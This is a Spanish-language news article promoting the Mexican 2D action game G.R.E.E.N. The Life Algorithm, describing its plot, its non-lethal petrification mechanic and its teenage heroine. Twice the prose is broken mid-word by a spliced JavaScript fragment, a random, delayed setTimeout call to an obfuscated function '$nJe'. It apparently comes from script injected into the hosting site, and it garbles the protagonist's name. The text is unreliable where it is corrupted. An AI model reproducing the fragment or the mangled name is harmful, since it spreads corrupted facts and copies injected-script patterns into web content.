El videojuego en donde debes sobrevivir sin matar a tus enemigos

    El videojuego en donde debes sobrevivir sin matar a tus enemigos

    Disponible para  PS4, XboxOne, Nintendo Switch y Steam.

    Autor: Elizabeth Rivera 18 diciembre, 2019



    Youtube

     

    Conoce este videojuego mexicano

     

     

    Estación Pi, el estudio líder en el desarrollo avanzado de videojuegos con base en la Ciudad de México, lanzó a nivel mundial G.R.E.E.N. The Life Algorithm, un juego 2D de última generación de acción/aventura que se desarrolla en un mundo conquistado por vegetación inteligente y alterada genéticamente. Desde el 22 de noviembre pasado se encuentra disponible para  PS4, XboxOne, Nintendo Switch y Steam.

     

     

    ¿De qué trata?

     

    La humanidad se encuentra al borde de la extinción y sólo tú puedes adentrarte en un desafiante territorio post apocalíptico, enfrentandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando batallas contra plantas letales e inteligentes.

     

    ¿Tu objetivo? Recorrer escenarios para reparar el S.M.A. (Sistema de Marchitación Avanzada) y así salvar el OA515, un desierto artificial capaz de combatir los embates de la vegetación.

     

    En tu camino debes encontrar respuestas a la catástrofe, buscar soluciones y salvar a la humanidad restante del planeta.

     

     

     

     

     

    Lo novedoso de G.R.E.E.N

     

     

    Este videojuego single player cambia todas las reglas del diseño, programación y desempeño pues presenta una mecánica vanguardista donde es imposible matar a los enemigos. 

     

    El reto es petrificar a las plantas y utilizarlas a tu favor para resolver las complicaciones, así como aprovechar el entorno a tu conveniencia y descifrar cómo utilizar a tus enemigos petrificados y transformarlos en plataformas o proyectiles para poder progresar.

     

    Otro recurso innovador, que distingue G.R.E.E.N. The Life Algorithm de otros juegos de la categoría se encuentra en el personaje principal, Zandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and, una heroína de 17 años que desafía y supera todas las expectativas, convirtiendo a este videojuego en uno de los pocos donde el héroe es una mujer.

     

    Además este es un videojuego de acción, sin violencia o muerte, que brinda conciencia sobre el necesario cuidado y respeto a la naturaleza. 

     

     

     

    Conoce más sobre su historia y universo en este enlace.

     

     

    Ahora échale un ojo a los LOS VIDEOJUEGOS MÁS ESPERADOS EN EL 2020.

     

    Temas relacionados con esta nota: ,

Disponible para  PS4, XboxOne, Nintendo Switch y Steam.